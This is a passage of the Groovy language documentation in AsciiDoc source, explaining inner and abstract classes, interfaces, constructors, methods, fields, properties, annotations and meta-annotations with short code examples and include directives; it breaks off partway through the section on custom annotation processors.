Classes other than the enclosing class are not allowed to access inner classes. Here is an example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class,indent=0]\n----\n<1> the inner class is instantiated and its method gets called\n<2> inner class definition, inside its enclosing class\n<3> even being private, a field of the enclosing class is accessed by the inner class\n\nThere are some reasons for using inner classes:\n\n * They increase encapsulation by hiding the inner class from other classes, which do not need to know about it. This also leads to cleaner packages and workspaces.\n * They provide a good organization by grouping classes that are used by only one class.\n * They lead to more maintainable code, since inner classes are near the classes that use them.\n\nIn several cases, inner classes are implementations of interfaces whose methods are needed by the outer class. The code below illustrates this with the usage of threads, which are very common.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=inner_class2,indent=0]\n----\n\nNote that the class `Inner2` is defined only to provide an implementation of the method `run` to class `Outer2`. Anonymous inner classes help to eliminate verbosity in this case.\n\n\n===== Anonymous inner class\n\nThe last example of an inner class can be simplified with an anonymous inner class. The same functionality can be achieved with the following code.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=anonymous_inner_class,indent=0]\n----\n<1> comparing with the last example of the previous section, the `new Inner2()` was replaced by `new Runnable()` along with all its implementation\n<2> the method `start` is invoked normally\n\nThus, there was no need to define a new class to be used just once.\n\n\n==== Abstract class\n\nAbstract classes represent generic concepts; thus, they cannot be instantiated, being created to be subclassed. Their members include fields\/properties and abstract or concrete methods. Abstract methods do not have an implementation, and must be implemented by concrete subclasses.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=abstract_class,indent=0]\n----\n<1> abstract classes must be declared with the `abstract` keyword\n<2> abstract methods must also be declared with the `abstract` keyword\n\nAbstract classes are commonly compared to interfaces. But there are at least two important differences when choosing one or the other. First, while abstract classes may contain fields\/properties and concrete methods, interfaces may contain only abstract methods (method signatures). Moreover, one class can implement several interfaces, whereas it can extend just one class, abstract or not. \n\n=== Interface\n\nAn interface defines a contract that a class needs to conform to. An interface only defines a list of methods that need\nto be implemented, but does not define the method implementations.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_def_1,indent=0]\n----\n<1> an interface needs to be declared using the `interface` keyword\n<2> an interface only defines method signatures\n\nMethods of an interface are always *public*. 
It is an error to use `protected` or `private` methods in interfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=protected_forbidden,indent=0]\n----\n<1> Using `protected` is a compile-time error\n\nA class _implements_ an interface if it defines the interface in its `implements` list or if any of its superclasses\ndoes:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=class_implements,indent=0]\n----\n<1> The `SystemGreeter` declares the `Greeter` interface using the `implements` keyword\n<2> Then implements the required `greet` method\n<3> Any instance of `SystemGreeter` is also an instance of the `Greeter` interface\n\nAn interface can extend another interface:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=extended_interface,indent=0]\n----\n<1> the `ExtendedGreeter` interface extends the `Greeter` interface using the `extends` keyword\n\nIt is worth noting that for a class to be an instance of an interface, it has to be explicit. For example, the following\nclass defines the `greet` method as it is declared in the `Greeter` interface, but does not declare `Greeter` in its\ninterfaces:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=no_structural_interface,indent=0]\n----\n\nIn other words, Groovy does not define structural typing. It is however possible to make an instance of an object\nimplement an interface at runtime, using the `as` coercion operator:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=interface_coercion,indent=0]\n----\n<1> create an instance of `DefaultGreeter` that does not implement the interface\n<2> coerce the instance into a `Greeter` at runtime\n<3> the coerced instance implements the `Greeter` interface\n\nYou can see that there are two distinct objects: one is the source object, a `DefaultGreeter` instance, which does not\nimplement the interface. The other is an instance of `Greeter` that delegates to the coerced object.\n\nTIP: Groovy interfaces do not support default implementation like Java 8 interfaces. If you are looking for something\nsimilar (but not equal), <<_traits,traits>> are close to interfaces, but allow default implementation as well as other\nimportant features described in this manual.\n\n=== Constructors\n\nConstructors are special methods used to initialize an object with a specific state. As with normal methods,\nit is possible for a class to declare more than one constructor, so long as each constructor has a unique\ntype signature. If an object doesn't require any parameters during construction, it may use a _no-arg_ constructor.\nIf no constructors are supplied, an empty no-arg constructor will be provided by the Groovy compiler. For constructors\nwith parameters, Groovy supports two invocation styles: using positional parameters or named parameters.\nThe former style is similar to how you would use Java constructors, while the second way\nallows one to specify parameter names when invoking the constructor.\n\n==== Positional argument constructor\n\nTo create an object by using positional argument constructors, the respective class needs to declare one or more\nconstructors. In the case of multiple constructors, each must have a unique type signature. 
The constructors can also\nadded to the class using the gapi:groovy.transform.TupleConstructor[] annotation.\n\nTypically, once at least one constructor is declared, the class can only be instantiated by having one of its\nconstructors called. It is worth noting that, in this case, you can't normally create the class with named parameters.\nGroovy does support named parameters so long as the class contains a no-arg constructor or a constructor which takes\na single `Map` argument - see the next section for details.\n\nThere are three forms of using a declared constructor. The first one is the normal Java way, with the `new` keyword.\nThe others rely on coercion of lists into the desired types. In this case, it is possible to coerce with the `as`\nkeyword and by statically typing the variable.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_positional_parameters,indent=0]\n----\n<1> Constructor declaration\n<2> Constructor invocation, classic Java way\n<3> Constructor usage, using coercion with `as` keyword\n<4> Constructor usage, using coercion in assignment\n\n\n==== Named argument constructor\n\nIf no (or a no-arg) constructor is declared, it is possible to create objects by passing parameters in the form of a\nmap (property\/value pairs). This can be in handy in cases where one wants to allow several combinations of parameters.\nOtherwise, by using traditional positional parameters it would be necessary to declare all possible constructors.\nHaving a constructor taking a single `Map` argument is also supported - such a constructor may also be added using\nthe gapi:groovy.transform.MapConstructor[] annotation.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=constructor_named_parameters,indent=0]\n----\n<1> No constructor declared\n<2> No parameters given in the instantiation\n<3> `name` parameter given in the instantiation\n<4> `age` parameter given in the instantiation\n<5> `name` and `age` parameters given in the instantiation\n\nIt is important to highlight, however, that this approach gives more power to the constructor caller,\nwhile imposing an increased responsibility on the caller to get the names and value types correct.\nThus, if greater control is desired, declaring constructors using positional parameters might be preferred.\n\nNotes:\n\n* While the example above supplied no constructor, you can also supply a no-arg constructor\nor a constructor with a single `Map` argument as previously mentioned.\n* You can support both named and positional construction\nby supply both positional constructors as well as a no-arg or Map constructor.\n* When no (or a no-arg) constructor is declared, Groovy replaces the named constructor call by a call\nto the no-arg constructor followed by calls to the setter for each supplied named property. So, you\nmight be better off using the Map constructor if your properties are declared as `final` (since they\nmust be set in the constructor rather than after the fact with setters).\n\n\n=== Methods\n\nGroovy methods are quite similar to other languages. Some peculiarities will be shown in the next subsections. \n\n==== Method definition\n\nA method is defined with a return type or with the `def` keyword, to make the return type untyped. A method can also receive any number of arguments, which may not have their types explicitly declared. 
Java modifiers can be used normally, and if no visibility modifier is provided, the method is public.\n\nMethods in Groovy always return some value. If no `return` statement is provided, the value evaluated in the last line executed will be returned. For instance, note that none of the following methods uses the `return` keyword.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=method_definition ,indent=0]\n----\n<1> Method with no return type declared and no parameter\n<2> Method with explicit return type and no parameter\n<3> Method with a parameter with no type defined\n<4> Static method with a String parameter\n\n==== Named arguments\n\nLike constructors, normal methods can also be called with named arguments. They need to receive the parameters as a map. In the method body, the values can be accessed as in normal maps (`map.key`).\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=named_arguments ,indent=0]\n----\n\n==== Default arguments\n\nDefault arguments make parameters optional. If the argument is not supplied, the method assumes a default value.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=default_arguments ,indent=0]\n----\n\nNote that no mandatory parameter can be defined after a default parameter is present, only other default parameters.\n\n==== Varargs\n\nGroovy supports methods with a variable number of arguments. They are defined like this: `def foo(p1, ..., pn, T... args)`.\nHere `foo` supports `n` arguments by default, but also an unspecified number of further arguments exceeding `n`.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_example,indent=0]\n----\n\nThis example defines a method `foo`, that can take any number of arguments, including no arguments at all.\n`args.length` will return the number of arguments given. Groovy allows `T[]` as an alternative notation to `T...`.\nThat means any method with an array as the last parameter is seen by Groovy as a method that can take a variable number of arguments.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_notation,indent=0]\n----\n\nIf a method with varargs is called with `null` as the vararg parameter, then the argument will be `null` and not an array of length one with `null` as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_null_parameter,indent=0]\n----\n\nIf a varargs method is called with an array as an argument, then the argument will be that array instead of an array of length one containing the given array as the only element.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_array_parameter,indent=0]\n----\n\nAnother important point is varargs in combination with method overloading. 
In the case of method overloading, Groovy will select the most specific method.\nFor example if a method `foo` takes a varargs argument of type `T` and another method `foo` also takes one argument of type `T`, the second method is preferred.\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=varargs_method_overloading,indent=0]\n----\n\n==== Method selection algorithm\n\n(TBD)\n\n==== Exception declaration\n\nGroovy automatically allows you to treat checked exceptions like unchecked exceptions.\nThis means that you don't need to declare any checked exceptions that a method may throw\nas shown in the following example which can throw a `FileNotFoundException` if the file isn't found:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=idiomatic_method_declaration,indent=0]\n----\n\nNor will you be required to surround the call to the `badRead` method in the previous example within a try\/catch\nblock - though you are free to do so if you wish.\n\nIf you wish to declare any exceptions that your code might throw (checked or otherwise) you are free to do so.\nAdding exceptions won't change how the code is used from any other Groovy code but can be seen as documentation\nfor the human reader of your code. The exceptions will become part of the method declaration in the bytecode,\nso if your code might be called from Java, it might be useful to include them.\nUsing an explicit checked exception declaration is illustrated in the following example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/objectorientation\/MethodsTest.groovy[tags=checked_method_declaration,indent=0]\n----\n\n=== Fields and properties\n\n[[fields]]\n==== Fields\n\nA field is a member of a class or a trait which has:\n\n* a mandatory _access modifier_ (`public`, `protected`, or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_declaration,indent=0]\n----\n<1> a `private` field named `id`, of type `int`\n<2> a `protected` field named `description`, of type `String`\n<3> a `public static final` field named _DEBUG_ of type `boolean`\n\nA field may be initialized directly at declaration:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=field_initialization,indent=0]\n----\n<1> the private field `id` is initialized with `IDGenerator.next()`\n\nIt is possible to omit the type declaration of a field. This is however considered a bad practice and in general it\nis a good idea to use strong typing for fields:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=typing_fields,indent=0]\n----\n<1> the field `mapping` doesn't declare a type\n<2> the field `mapping` has a strong type\n\nThe difference between the two is important if you want to use optional type checking later. It is also important\nfor documentation. However, in some cases like scripting, or if you want to rely on duck typing, it may be useful\nto omit the type.\n\n[[properties]]\n==== Properties\n\nA property is an externally visible feature of a class. Rather than just using a public field to represent\nsuch features (which provides a more limited abstraction and would restrict refactoring possibilities),\nthe typical convention in Java is to follow JavaBean conventions, i.e. 
[[properties]]\n==== Properties\n\nA property is an externally visible feature of a class. Rather than just using a public field to represent\nsuch features (which provides a more limited abstraction and would restrict refactoring possibilities),\nthe typical convention in Java is to follow JavaBean conventions, i.e. represent the property using a\ncombination of a private backing field and getters\/setters. Groovy follows these same conventions\nbut provides a simpler approach to defining the property. You can define a property with:\n\n* an *absent* access modifier (no `public`, `protected` or `private`)\n* one or more optional _modifiers_ (`static`, `final`, `synchronized`)\n* an optional _type_\n* a mandatory _name_\n\nGroovy will then generate the getters\/setters appropriately. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_definition,indent=0]\n----\n<1> creates a backing `private String name` field, a `getName` and a `setName` method\n<2> creates a backing `private int age` field, a `getAge` and a `setAge` method\n\nIf a property is declared `final`, no setter is generated:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=readonly_property,indent=0]\n----\n<1> defines a read-only property of type `String`\n<2> defines a read-only property of type `int`\n<3> assigns the `name` parameter to the `name` field\n<4> assigns the `age` parameter to the `age` field\n\nProperties are accessed by name and will call the getter or setter transparently, unless the code is in the class\nwhich defines the property:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=property_access,indent=0]\n----\n<1> `this.name` will directly access the field because the property is accessed from within the class that defines it\n<2> similarly, a read access is done directly on the `name` field\n<3> write access to the property is done outside of the `Person` class, so it will implicitly call `setName`\n<4> read access to the property is done outside of the `Person` class, so it will implicitly call `getName`\n<5> this will call the `name` method on `Person` which performs a direct access to the field\n<6> this will call the `wonder` method on `Person` which performs a direct read access to the field\n\nIt is worth noting that this behavior of accessing the backing field directly is done in order to prevent a stack\noverflow when using the property access syntax within a class that defines the property.\n\nIt is possible to list the properties of a class thanks to the meta `properties` field of an instance:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=properties_meta,indent=0]\n----\n\nBy convention, Groovy will recognize properties even if there is no backing field,\nprovided there are getters or setters\nthat follow the JavaBeans specification. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=pseudo_properties,indent=0]\n----\n<1> writing `p.name` is allowed because there is a pseudo-property `name`\n<2> reading `p.age` is allowed because there is a pseudo-read-only property `age`\n<3> writing `p.groovy` is allowed because there is a pseudo-write-only property `groovy`\n\nThis syntactic sugar is at the core of many DSLs written in Groovy.\n\n
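Since the property listings are external includes, here is a compact, assumed sketch of a property declaration and the generated accessors in action:\n\n[source,groovy]\n----\nclass Person {\n    String name        \/\/ property: a private backing field plus generated getName()\/setName()\n    final int age      \/\/ read-only property: no setter is generated\n\n    Person(int age) { this.age = age }\n}\n\ndef p = new Person(42)\np.name = 'Alice'               \/\/ implicitly calls setName\nassert p.name == 'Alice'       \/\/ implicitly calls getName\nassert p.age == 42             \/\/ getter only; p.age = 43 would fail\n----\n\n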
=== Annotation\n\n[[ann-definition]]\n==== Annotation definition\n\nAn annotation is a kind of special interface dedicated to annotating elements of the code. An annotation is a type whose\nsuperinterface is the jdk:java.lang.annotation.Annotation[Annotation] interface. Annotations are declared in a very\nsimilar way to interfaces, using the `@interface` keyword:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=define_annotation,indent=0]\n----\n\nAn annotation may define members in the form of methods without bodies, with an optional default value. The possible\nmember types are limited to:\n\n* primitive types\n* jdk:java.lang.String[Strings]\n* jdk:java.lang.Class[Classes]\n* an jdk:java.lang.Enum[enumeration]\n* another jdk:java.lang.annotation.Annotation[annotation type]\n* or any array of the above\n\nFor example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_string_default,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_int,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_class,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_annotation,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_member_enum,indent=0]\n----\n<1> an annotation defining a `value` member of type `String`\n<2> an annotation defining a `value` member of type `String` with a default value of `something`\n<3> an annotation defining a `step` member of the primitive type `int`\n<4> an annotation defining an `appliesTo` member of type `Class`\n<5> an annotation defining a `value` member whose type is an array of another annotation type\n<6> an annotation defining a `dayOfWeek` member whose type is the enumeration type `DayOfWeek`\n\nUnlike in the Java language, in Groovy, an annotation can be used to alter the semantics of the language. This is especially\ntrue of AST transformations, which generate code based on annotations.\n\n[[ann-placement]]\n==== Annotation placement\n\nAn annotation can be applied to various elements of the code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=apply_annotation_1,indent=0]\n----\n<1> `@SomeAnnotation` applies to the `someMethod` method\n<2> `@SomeAnnotation` applies to the `SomeClass` class\n<3> `@SomeAnnotation` applies to the `var` variable\n\nIn order to limit the scope where an annotation can be applied, it is necessary to declare it on the annotation\ndefinition, using the jdk:java.lang.annotation.Target[Target] annotation. For example, here is how you would\ndeclare that an annotation can be applied to a class or a method:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_target,indent=0]\n----\n<1> the `@Target` annotation is meant to annotate an annotation with a scope.\n<2> `@SomeAnnotation` will therefore only be allowed on `TYPE` or `METHOD`\n\nThe list of possible targets is available in the jdk:java.lang.annotation.ElementType[ElementType enumeration].\n\nWARNING: Groovy does not support the jdk:java.lang.annotation.ElementType#TYPE_PARAMETER[TYPE_PARAMETER] and\njdk:java.lang.annotation.ElementType#TYPE_USE[TYPE_USE] element types which were introduced in Java 8.\n\n
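For readers without access to the included test sources, a minimal assumed sketch of an annotation restricted to classes and methods could look like this:\n\n[source,groovy]\n----\nimport java.lang.annotation.ElementType\nimport java.lang.annotation.Target\n\n\/\/ Hypothetical sketch: only allowed on types and methods\n@Target([ElementType.TYPE, ElementType.METHOD])\n@interface SomeAnnotation {\n    String value() default 'something'   \/\/ member with a default value\n}\n----\n\n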
==== Annotation member values\n\nWhen an annotation is used, it is required to set at least all members that do not have a default value. For example:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set,indent=0]\n----\n\nHowever, it is possible to omit `value=` in the declaration of the value of an annotation if the member `value` is the\nonly one being set:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotation_value_set_option,indent=0]\n----\n<1> we can omit the `statusCode` because it has a default value, but `value` needs to be set\n<2> since `value` is the only mandatory member without a default, we can omit `value=`\n<3> if both `value` and `statusCode` need to be set, it is required to use `value=` for the default `value` member\n\n==== Retention policy\n\nThe visibility of an annotation depends on its retention policy. The retention policy of an annotation is set using\nthe jdk:java.lang.annotation.Retention[Retention] annotation:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=ann_retention,indent=0]\n----\n<1> the `@Retention` annotation annotates the `@SomeAnnotation` annotation\n<2> so `@SomeAnnotation` will have a `SOURCE` retention\n\nThe list of possible retention targets and their descriptions is available in the\njdk:java.lang.annotation.RetentionPolicy[RetentionPolicy] enumeration. The\nchoice usually depends on whether you want an annotation to be visible at\ncompile time or runtime.\n\n==== Closure annotation parameters\n\nAn interesting feature of annotations in Groovy is that you can use a closure as an annotation value. Therefore\nannotations may be used with a wide variety of expressions and still have IDE support. For example, imagine a\nframework where you want to execute some methods based on environmental constraints like the JDK version or the OS.\nOne could write the following code:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_example,indent=0]\n----\n\nFor the `@OnlyIf` annotation to accept a `Closure` as an argument, you only have to declare the `value` as a `Class`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_def,indent=0]\n----\n\nTo complete the example, let's write a sample runner that would use that information:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner,indent=0]\n----\n<1> create a new instance of the class passed as an argument (the task class)\n<2> emulate an environment which is JDK 6 and not Windows\n<3> iterate on all declared methods of the task class\n<4> if the method is public and takes no arguments\n<5> try to find the `@OnlyIf` annotation\n<6> if it is found, get the `value` and create a new `Closure` out of it\n<7> set the `delegate` of the closure to our environment variable\n<8> call the closure, which is the annotation closure. It will return a `boolean`\n<9> if it is `true`, call the method\n<10> if the method is not annotated with `@OnlyIf`, execute the method anyway\n<11> after that, return the task object\n\nThen the runner can be used this way:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=closure_ann_runner_exec,indent=0]\n----\n\n
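As a self-contained illustration of the idea (the `jdk` and `windows` names are assumed to be resolved later through the closure's `delegate`, as in the runner above):\n\n[source,groovy]\n----\n\/\/ Hypothetical sketch: a Class-typed member lets callers pass a closure\n@interface OnlyIf {\n    Class value()\n}\n\nclass Tasks {\n    @OnlyIf({ jdk >= 6 && !windows })\n    void listFiles() { println 'listing files' }\n}\n----\n\n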
==== Meta-annotations\n\n===== Declaring meta-annotations\n\nMeta-annotations, also known as annotation aliases, are annotations that\nare replaced at compile time by other annotations (one meta-annotation\nis an alias for one or more annotations). Meta-annotations can be used to\nreduce the size of code involving multiple annotations.\n\nLet's start with a simple example. Imagine you have the `@Service`\nand `@Transactional` annotations and that you want to annotate a class\nwith both:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class,indent=0]\n----\n\nGiven the multiplication of annotations that you could add to the same class, a meta-annotation\ncould help by replacing the two annotations with a single one having the very same semantics. For example,\nwe might want to write this instead:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=transactionalservice_class2,indent=0]\n----\n<1> `@TransactionalService` is a meta-annotation\n\nA meta-annotation is declared as a regular annotation but annotated with `@AnnotationCollector` and the\nlist of annotations it is collecting. In our case, the `@TransactionalService` annotation can be written:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=metaann_ts,indent=0]\n----\n<1> annotate the meta-annotation with `@Service`\n<2> annotate the meta-annotation with `@Transactional`\n<3> annotate the meta-annotation with `@AnnotationCollector`\n\n[[meta-ann-behavior]]\n===== Behavior of meta-annotations\n\nGroovy supports both _precompiled_ and _source form_\nmeta-annotations. This means that your meta-annotation _may_ be\nprecompiled, or you can have it in the same source tree as the code you\nare currently compiling.\n\nINFO: Meta-annotations are a Groovy-only feature. You cannot\nannotate a Java class with a meta-annotation and\nexpect it to behave the same as in Groovy. Likewise, you cannot write a\nmeta-annotation in Java: both the meta-annotation definition *and* usage\nhave to be Groovy code. But you can happily collect Java annotations\nand Groovy annotations within your meta-annotation.\n\nWhen the Groovy compiler encounters a class annotated with a\nmeta-annotation, it *replaces* it with the collected annotations. So,\nin our previous example, it will\nreplace `@TransactionalService` with `@Transactional` and `@Service`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=annotations_expanded,indent=0]\n----\n\nThe conversion from a meta-annotation to the collected annotations is performed during the\n_semantic analysis_ compilation phase.\n\nIn addition to replacing the alias with the collected annotations, a meta-annotation is capable of\nprocessing them, including arguments.\n\n[[meta-ann-members]]\n===== Meta-annotation parameters\n\nMeta-annotations can collect annotations which have parameters. To illustrate this,\nwe will imagine two annotations, each of them accepting one argument:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\n----\n\nAnd suppose that you want to create a meta-annotation named `@Explosive`:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collected_ann_explosive,indent=0]\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_explosive,indent=0]\n----\n\n
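The surrounding text names `@Timeout` and its `after` member; the second collected annotation here is assumed for illustration. A minimal sketch of such a collector might be:\n\n[source,groovy]\n----\nimport groovy.transform.AnnotationCollector\n\n@interface Timeout {\n    int after()\n}\n@interface Dangerous {\n    String type()\n}\n\n\/\/ Hypothetical sketch: default member values are baked into the alias\n@Timeout(after = 0)\n@Dangerous(type = 'explosive')\n@AnnotationCollector\n@interface Explosive {}\n----\n\n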
By default, when the annotations are replaced, they will get the\nannotation parameter values *as they were defined in the alias*. More interestingly,\nthe meta-annotation supports overriding specific values:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=example_bomb,indent=0]\n----\n<1> the `after` value provided as a parameter to `@Explosive` overrides the one defined in the `@Timeout` annotation\n\nIf two annotations define the same parameter name, the default processor\nwill copy the annotation value to all annotations that accept this parameter:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=collector_ann_same_values,indent=0]\n----\n<1> the `@Foo` annotation defines the `value` member of type `String`\n<2> the `@Bar` annotation also defines the `value` member of type `String`\n<3> the `@FooBar` meta-annotation aggregates `@Foo` and `@Bar`\n<4> class `Bob` is annotated with `@Foo` and `@Bar`\n<5> the value of the `@Foo` annotation on `Bob` is `a`\n<6> while the value of the `@Bar` annotation on `Bob` is `b`\n<7> class `Joe` is annotated with `@FooBar`\n<8> then the value of the `@Foo` annotation on `Joe` is `a`\n<9> and the value of the `@Bar` annotation on `Joe` is also `a`\n\nIn the second case, the meta-annotation value was copied into\nboth the `@Foo` and `@Bar` annotations.\n\nWARNING: It is a compile-time error if the collected annotations define the same members\nwith incompatible types. For example, if in the previous example `@Foo` defined a value of\ntype `String` but `@Bar` defined a value of type `int`.\n\nIt is, however, possible to customize the behavior of meta-annotations and describe how collected\nannotations are expanded. We'll look at how to do that shortly, but first there is an advanced\nprocessing option to cover.\n\n[[handling_duplicate_annotations]]\n===== Handling duplicate annotations\n\nThe `@AnnotationCollector` annotation supports a `mode` parameter which can be used to\nalter how the default processor handles annotation replacement in the presence of\nduplicate annotations.\n\nINFO: Custom processors (discussed next) may or may not support this parameter.\n\nAs an example, suppose you create a meta-annotation containing the `@ToString` annotation\nand then place your meta-annotation on a class that already has an explicit `@ToString`\nannotation. Should this be an error? Should both annotations be applied? Does one take\npriority over the other? There is no correct answer. In some scenarios it might be\nquite appropriate for any of these answers to be correct. So, rather than trying to\npreempt one correct way to handle the duplicate annotation issue, Groovy lets you\nwrite your own custom meta-annotation processors (covered next) and lets you write\nwhatever checking logic you like within AST transforms - which are a frequent target for\naggregating. Having said that, by simply setting the `mode`, a number of commonly\nexpected scenarios are handled automatically for you without any extra coding.\nThe behavior of the `mode` parameter is determined by the `AnnotationCollectorMode`\nenum value chosen and is summarized in the following table.\n\n|================================\n| Mode | Description\n| DUPLICATE | Annotations from the annotation collection will always be inserted. After all transforms have been run, it will be an error if multiple annotations (excluding those with SOURCE retention) exist.\n| PREFER_COLLECTOR | Annotations from the collector will be added and any existing annotations with the same name will be removed.\n| PREFER_COLLECTOR_MERGED | Annotations from the collector will be added and any existing annotations with the same name will be removed, but any new parameters found within existing annotations will be merged into the added annotation.\n| PREFER_EXPLICIT | Annotations from the collector will be ignored if any existing annotations with the same name are found.\n| PREFER_EXPLICIT_MERGED | Annotations from the collector will be ignored if any existing annotations with the same name are found, but any new parameters on the collector annotation will be added to existing annotations.\n|================================\n\n
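To make the `mode` parameter concrete, here is a short assumed sketch using the `@ToString` scenario described above:\n\n[source,groovy]\n----\nimport groovy.transform.AnnotationCollector\nimport groovy.transform.AnnotationCollectorMode\nimport groovy.transform.ToString\n\n\/\/ Hypothetical sketch: an explicit @ToString on the annotated class wins over the collected one\n@ToString(excludes = 'id')\n@AnnotationCollector(mode = AnnotationCollectorMode.PREFER_EXPLICIT)\n@interface MyToString {}\n----\n\n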
[[meta-ann-processor]]\n===== Custom annotation processors\n\nA custom annotation processor will let you choose how to expand a\nmeta-annotation into collected annotations. The behaviour of the meta-annotation is,\nin this case, totally up to you. To do this, you must:\n\n* create a meta-annotation processor, extending gapi:org.codehaus.groovy.transform.AnnotationCollectorTransform[AnnotationCollectorTransform]\n* declare the processor to be used in the meta-annotation declaration\n\nTo illustrate this, we are going to explore how the meta-annotation `@CompileDynamic` is implemented.\n\n`@CompileDynamic` is a meta-annotation that expands itself\nto `@CompileStatic(TypeCheckingMode.SKIP)`. The problem is that the\ndefault meta-annotation processor doesn't support enums, and the\nannotation value `TypeCheckingMode.SKIP` is one.\n\nThe naive implementation here would not work:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_naive,indent=0]\n----\n\nInstead, we will define it like this:\n\n[source,groovy]\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_def_fixed,indent=0]\n----\n\nThe first thing you may notice is that our interface is no longer\nannotated with `@CompileStatic`. The reason for this is that we rely on\nthe `processor` parameter instead, which references a class that\nwill *generate* the annotation.\n\nHere is how the custom processor is implemented:\n\n[source,groovy]\n.CompileDynamicProcessor.groovy\n----\ninclude::{projectdir}\/src\/spec\/test\/ClassTest.groovy[tags=compiledynamic_processor,indent=0]\n----\n<1> our custom processor is written in Groovy, and for better compilation performance, we use static compilation\n<2> the custom processor has to extend 